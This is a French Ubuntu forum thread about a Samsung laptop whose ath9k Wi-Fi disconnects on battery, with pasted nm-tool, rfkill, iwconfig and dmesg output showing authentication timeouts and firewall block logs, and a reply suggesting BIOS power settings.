Extra:tsf=000002849f813122 Extra: Last beacon: 1996ms ago IE: Unknown: 00174B616D657264656C6C6520383320287068696C69707329 IE: Unknown: 010582848B962C IE: Unknown: 030106 IE: Unknown: 2A0100 IE: Unknown: 32080C1218243048606C >> uname -r -m 3.5.0-19-generic x86_64 >> cat /etc/network/interfaces # interfaces(5) file used by ifup(8) and ifdown(8) auto lo iface lo inet loopback >> nm-tool NetworkManager Tool State: connected (global) - Device: eth0 ----------------------------------------------------------------- Type: Wired Driver: r8169 State: unavailable Default: no HW Address: 00:24:54:18:83:2B Capabilities: Carrier Detect: yes Wired Properties Carrier: off - Device: wlan0 [homell] ------------------------------------------------------ Type: 802.11 WiFi Driver: ath9k State: connected Default: yes HW Address: 00:26:B6:66:D3:D6 Capabilities: Speed: 48 Mb/s Wireless Properties WEP Encryption: yes WPA Encryption: yes WPA2 Encryption: yes Wireless Access Points (* = current AP) *homell: Infra, 00:C0:49:DA:DA:08, Freq 2412 MHz, Rate 54 Mb/s, Strength 51 WPA TP LINK: Infra, 74:EA:3A:C8:2A:BA, Freq 2412 MHz, Rate 54 Mb/s, Strength 19 WPA2 Kamerdelle 83 (philips): Infra, 00:30:F1:FB:1D:A0, Freq 2437 MHz, Rate 54 Mb/s, Strength 30 WEP vax: Infra, 00:0D:93:7E:5A:84, Freq 2437 MHz, Rate 54 Mb/s, Strength 39 WPA IPv4 Settings: Address: 192.168.1.113 Prefix: 24 (255.255.255.0) Gateway: 192.168.1.20 DNS: 192.168.1.1 DNS: 192.168.1.2 >> sudo rfkill list 0: hci0: Bluetooth Soft blocked: yes Hard blocked: no 1: phy0: Wireless LAN Soft blocked: no Hard blocked: no 2: samsung-wlan: Wireless LAN Soft blocked: no Hard blocked: no Hors ligne Alex0000 Re : Déconnexion sur Batterie [Samsung] up Hors ligne toutafai Re : Déconnexion sur Batterie [Samsung] Bonsoir, es-ce que ton portable est passé en veille quand il était sur batterie ? cela me fait penser a un pb de gestion d’énergie, regarde dans le bios si tu n'as pas des paramètres a ce niveau la ... la prochaine fois que cela t'arrive, et avant de bidouiller quoique ce soit donne le retour de dmesg |grep -e wlan0 -e wireless - e ath9k cat /var/lib/NetworkManager/NetworkManager.state iwconfig Ubuntu Server 12.04 x32 sur IBM P4. - XP / Seven / Ubuntu 14.04 x64 sur Lenovo ThinkPad. Purée d'unity...difficile de s'y faire - canon MG5350 - Logitech Quickcam 3000 - TNT Intuix S800 - Freebox v6 révolution (Trop de la balle !!!) Utilisateur d'Ubuntu depuis novembre 2006. 23 PC libérés grâce aux OS libres...et de 24 et quel 24 ...car pc au taff et pour le taff ^^ Hors ligne Alex0000 Re : Déconnexion sur Batterie [Samsung] Tout d'abord merci d'avoir pris le temps de me répondre. Au niveau de la veille, non ce n'est pas le cas. Ca arrive que je vienne de boot, sortir de veille, hibernation ou danse la polka! Mais je vais checker le bios; je n'y avais pas pensé. Je poste le retour dès qu'il me lache Dernière modification par Alex0000 (Le 16/12/2012, à 00:16) Hors ligne Alex0000 Re : Déconnexion sur Batterie [Samsung] Alors voici les réponse des commandes déconnexion 5 minute après le boot: oumpa@lap-oumpa:~$ cat /var/lib/NetworkManager/NetworkManager.state [main] NetworkingEnabled=true WirelessEnabled=true WWANEnabled=true WimaxEnabled=true oumpa@lap-oumpa:~$ dmesg |grep -e wlan0 -e wireless - e ath9k (entrée standard):[ 26.150266] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready (entrée standard):[ 26.152196] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready (entrée standard):[ 28.003299] wlan0: authenticate with 90:94:e4:d2:6a:56 (entrée standard):[ 28.011830] wlan0: send auth to 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 28.014495] wlan0: authenticated (entrée standard):[ 28.021134] wlan0: associating with AP with corrupt beacon (entrée standard):[ 28.024084] wlan0: associate with 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 28.030491] wlan0: RX AssocResp from 90:94:e4:d2:6a:56 (capab=0xc11 status=0 aid=2) (entrée standard):[ 28.030579] wlan0: associated (entrée standard):[ 28.031443] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready (entrée standard):[ 64.677798] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 134.863515] wlan0: authenticate with 90:94:e4:d2:6a:56 (entrée standard):[ 135.261468] wlan0: send auth to 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 135.464020] wlan0: send auth to 90:94:e4:d2:6a:56 (try 2/3) (entrée standard):[ 135.668056] wlan0: send auth to 90:94:e4:d2:6a:56 (try 3/3) (entrée standard):[ 135.872048] wlan0: authentication with 90:94:e4:d2:6a:56 timed out (entrée standard):[ 138.554721] wlan0: authenticate with 90:94:e4:d2:6a:56 (entrée standard):[ 138.950754] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 139.152018] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 2/3) (entrée standard):[ 139.356034] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 3/3) (entrée standard):[ 139.560018] wlan0: authentication with 90:94:e4:d2:6a:56 timed out (entrée standard):[ 142.244187] wlan0: authenticate with 90:94:e4:d2:6a:56 (entrée standard):[ 142.641568] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 142.844040] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 2/3) (entrée standard):[ 143.048044] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 3/3) (entrée standard):[ 143.252038] wlan0: authentication with 90:94:e4:d2:6a:56 timed out (entrée standard):[ 145.932456] wlan0: authenticate with 90:94:e4:d2:6a:56 (entrée standard):[ 146.328310] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 146.532035] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 2/3) (entrée standard):[ 146.736044] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 3/3) (entrée standard):[ 146.940047] wlan0: authentication with 90:94:e4:d2:6a:56 timed out (entrée standard):[ 148.041997] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready (entrée standard):[ 152.628846] wlan0: authenticate with 90:94:e4:d2:6a:56 (entrée standard):[ 153.025956] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 153.228035] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 2/3) (entrée standard):[ 153.432036] wlan0: direct probe to 90:94:e4:d2:6a:56 (try 3/3) (entrée standard):[ 153.636059] wlan0: authentication with 90:94:e4:d2:6a:56 timed out grep: e: Aucun fichier ou dossier de ce type grep: ath9k: Aucun fichier ou dossier de ce type oumpa@lap-oumpa:~$ iwconfig eth0 no wireless extensions. lo no wireless extensions. wlan0 IEEE 802.11bgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=14 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:on Et j'ai également eu le problème en sortie de veille oumpa@lap-oumpa:~$ dmesg |grep -e wlan0 -e wireless - e ath9k (entrée standard):[ 24.374058] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready (entrée standard):[ 24.375350] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready (entrée standard):[ 93.939308] wlan0: authenticate with 90:94:e4:d2:6a:56 (entrée standard):[ 93.946484] wlan0: send auth to 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 93.948503] wlan0: authenticated (entrée standard):[ 93.955493] wlan0: associating with AP with corrupt beacon (entrée standard):[ 93.956258] wlan0: associate with 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 93.960312] wlan0: RX AssocResp from 90:94:e4:d2:6a:56 (capab=0xc11 status=0 aid=3) (entrée standard):[ 93.960403] wlan0: associated (entrée standard):[ 93.961271] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready (entrée standard):[ 142.416984] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 267.450960] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 392.484797] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 517.416669] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 642.450021] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 731.526045] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=80.57.232.14 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=113 ID=10412 PROTO=UDP SPT=62076 DPT=59653 LEN=75 (entrée standard):[ 751.099943] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=98.92.180.142 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=107 ID=16706 PROTO=UDP SPT=22859 DPT=59653 LEN=75 (entrée standard):[ 768.406056] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 783.162810] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=124.168.49.52 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=110 ID=3029 PROTO=UDP SPT=29378 DPT=59653 LEN=75 (entrée standard):[ 819.497707] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=217.132.129.178 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=110 ID=26558 PROTO=UDP SPT=27851 DPT=59653 LEN=75 (entrée standard):[ 833.219634] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=62.255.232.114 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=114 ID=6751 PROTO=UDP SPT=44096 DPT=59653 LEN=75 (entrée standard):[ 838.554992] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=31.29.211.30 DST=192.168.1.40 LEN=131 TOS=0x00 PREC=0x00 TTL=110 ID=20939 PROTO=UDP SPT=28782 DPT=59653 LEN=111 (entrée standard):[ 838.961321] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=90.222.218.33 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=113 ID=15283 PROTO=UDP SPT=52238 DPT=59653 LEN=75 (entrée standard):[ 838.968753] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=90.222.218.33 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=15290 PROTO=UDP SPT=52238 DPT=59653 LEN=38 (entrée standard):[ 842.173131] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=90.222.218.33 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=15658 PROTO=UDP SPT=52238 DPT=59653 LEN=38 (entrée standard):[ 848.441516] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=90.222.218.33 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=16309 PROTO=UDP SPT=52238 DPT=59653 LEN=38 (entrée standard):[ 893.439484] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 895.807103] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=24.77.54.203 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=116 ID=34953 PROTO=UDP SPT=40189 DPT=59653 LEN=75 (entrée standard):[ 915.616834] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=88.235.52.54 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=51 ID=38481 PROTO=UDP SPT=12408 DPT=59653 LEN=75 (entrée standard):[ 929.149248] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=90.56.93.51 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=48 ID=3585 PROTO=UDP SPT=44520 DPT=59653 LEN=38 (entrée standard):[ 935.936315] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=90.222.218.33 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=25452 PROTO=UDP SPT=52238 DPT=59653 LEN=38 (entrée standard):[ 939.075037] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=90.222.218.33 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=25805 PROTO=UDP SPT=52238 DPT=59653 LEN=38 (entrée standard):[ 945.667844] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=90.222.218.33 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=26558 PROTO=UDP SPT=52238 DPT=59653 LEN=38 (entrée standard):[ 987.611437] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=94.12.214.227 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=29457 PROTO=UDP SPT=35652 DPT=59653 LEN=38 (entrée standard):[ 990.714691] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=94.12.214.227 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=30297 PROTO=UDP SPT=35652 DPT=59653 LEN=38 (entrée standard):[ 995.141942] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=97.89.80.143 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=45 ID=0 DF PROTO=UDP SPT=52053 DPT=59653 LEN=38 (entrée standard):[ 998.150317] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=97.89.80.143 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=45 ID=0 DF PROTO=UDP SPT=52053 DPT=59653 LEN=38 (entrée standard):[ 1013.053142] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=220.233.12.78 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=107 ID=29277 PROTO=UDP SPT=49849 DPT=59653 LEN=38 (entrée standard):[ 1019.498528] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 1040.040006] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=77.207.145.115 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=52 ID=65369 PROTO=UDP SPT=25444 DPT=59653 LEN=75 (entrée standard):[ 1061.804785] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=94.194.22.124 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=50 ID=44978 PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 1083.508559] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=90.222.218.33 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=8472 PROTO=UDP SPT=52238 DPT=59653 LEN=38 (entrée standard):[ 1102.080120] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=79.176.228.51 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=11246 PROTO=UDP SPT=20094 DPT=59653 LEN=38 (entrée standard):[ 1134.221457] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=86.156.13.168 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=110 ID=2574 PROTO=UDP SPT=63186 DPT=59653 LEN=75 (entrée standard):[ 1141.996297] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=83.86.228.115 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=52 ID=19364 PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 1172.390827] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=77.58.123.28 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=51 ID=34736 PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 1194.933595] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=83.86.228.115 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=52 ID=44641 PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 1210.708901] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=70.79.66.115 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=50 ID=53868 PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 1233.959743] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=89.134.77.194 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=23293 PROTO=UDP SPT=16087 DPT=59653 LEN=38 (entrée standard):[ 1250.906090] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=111.92.70.150 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=46 ID=34775 PROTO=UDP SPT=60879 DPT=59653 LEN=38 (entrée standard):[ 1265.827604] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=85.74.93.30 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=114 ID=47137 PROTO=UDP SPT=53646 DPT=59653 LEN=75 (entrée standard):[ 1300.548513] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=79.176.228.51 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=22631 PROTO=UDP SPT=20094 DPT=59653 LEN=38 (entrée standard):[ 1303.681009] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=79.176.228.51 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=22804 PROTO=UDP SPT=20094 DPT=59653 LEN=38 (entrée standard):[ 1320.598826] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=186.19.46.240 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=111 ID=4764 PROTO=UDP SPT=22500 DPT=59653 LEN=38 (entrée standard):[ 1340.837248] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=94.208.16.136 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=53 ID=7458 PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 1377.800565] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=105.236.1.136 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=112 ID=31017 PROTO=UDP SPT=23024 DPT=59653 LEN=75 (entrée standard):[ 1380.559154] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=84.229.137.34 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=14304 PROTO=UDP SPT=31025 DPT=59653 LEN=38 (entrée standard):[ 1414.874938] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=220.233.104.215 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=108 ID=63320 PROTO=UDP SPT=28335 DPT=59653 LEN=38 (entrée standard):[ 1424.599687] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=220.233.104.215 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=108 ID=64041 PROTO=UDP SPT=28335 DPT=59653 LEN=38 (entrée standard):[ 1443.223070] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=2.28.206.100 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=111 ID=27383 PROTO=UDP SPT=17720 DPT=59653 LEN=75 (entrée standard):[ 1471.324528] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=195.182.146.122 DST=192.168.1.40 LEN=129 TOS=0x00 PREC=0x00 TTL=112 ID=5359 PROTO=UDP SPT=23170 DPT=59653 LEN=109 (entrée standard):[ 1490.903537] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=89.134.77.194 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=11616 PROTO=UDP SPT=16087 DPT=59653 LEN=38 (entrée standard):[ 1501.859829] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=177.102.238.59 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=111 ID=23378 PROTO=UDP SPT=15444 DPT=59653 LEN=38 (entrée standard):[ 1521.273515] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=5.55.143.70 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=112 ID=10836 PROTO=UDP SPT=23100 DPT=59653 LEN=38 (entrée standard):[ 1549.567479] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=76.14.65.234 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=49 ID=27835 PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 1561.517882] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=77.58.123.28 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=51 ID=55417 PROTO=UDP SPT=51413 DPT=59653 LEN=38 (entrée standard):[ 1584.237946] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=120.61.30.238 DST=192.168.1.40 LEN=95 TOS=0x00 PREC=0x00 TTL=47 ID=20806 PROTO=UDP SPT=11536 DPT=59653 LEN=75 (entrée standard):[ 1597.574215] wlan0: deauthenticating from 90:94:e4:d2:6a:56 by local choice (reason=3) (entrée standard):[ 1710.513007] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready (entrée standard):[ 1715.476678] wlan0: authenticate with 90:94:e4:d2:6a:56 (entrée standard):[ 1715.489049] wlan0: send auth to 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 1715.491074] wlan0: authenticated (entrée standard):[ 1715.497563] wlan0: associating with AP with corrupt beacon (entrée standard):[ 1715.500070] wlan0: associate with 90:94:e4:d2:6a:56 (try 1/3) (entrée standard):[ 1715.504166] wlan0: RX AssocResp from 90:94:e4:d2:6a:56 (capab=0xc11 status=0 aid=3) (entrée standard):[ 1715.504256] wlan0: associated (entrée standard):[ 1715.505204] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready (entrée standard):[ 1730.305546] [UFW BLOCK] IN=wlan0 OUT= MAC=01:00:5e:00:00:01:00:24:c9:41:a5:b0:08:00 SRC=192.168.1.1 DST=224.0.0.1 LEN=36 TOS=0x08 PREC=0x80 TTL=1 ID=0 DF PROTO=2 (entrée standard):[ 1754.786892] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=96.49.53.116 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=801 PROTO=UDP SPT=20915 DPT=59653 LEN=38 (entrée standard):[ 1758.161750] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=96.49.53.116 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=1181 PROTO=UDP SPT=20915 DPT=59653 LEN=38 (entrée standard):[ 1759.090101] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=151.32.245.102 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=112 ID=54523 PROTO=UDP SPT=22496 DPT=59653 LEN=38 (entrée standard):[ 1764.508810] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=96.49.53.116 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=114 ID=1968 PROTO=UDP SPT=20915 DPT=59653 LEN=38 (entrée standard):[ 1764.955625] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=81.98.226.158 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=115 ID=14611 PROTO=UDP SPT=56154 DPT=59653 LEN=38 (entrée standard):[ 1774.519661] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=81.98.226.158 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=115 ID=18039 PROTO=UDP SPT=56154 DPT=59653 LEN=38 (entrée standard):[ 1834.224178] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=5.55.143.70 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=112 ID=17980 PROTO=UDP SPT=23100 DPT=59653 LEN=38 (entrée standard):[ 1837.336063] [UFW BLOCK] IN=wlan0 OUT= MAC=00:26:b6:66:d3:d6:00:24:c9:41:a5:b0:08:00 SRC=5.55.143.70 DST=192.168.1.40 LEN=58 TOS=0x00 PREC=0x00 TTL=113 ID=18272 PROTO=UDP SPT=23100 DPT=59653 LEN=38 (entrée standard):[ 1843.812995] [UFW BLOCK] IN=wlan0 OUT= 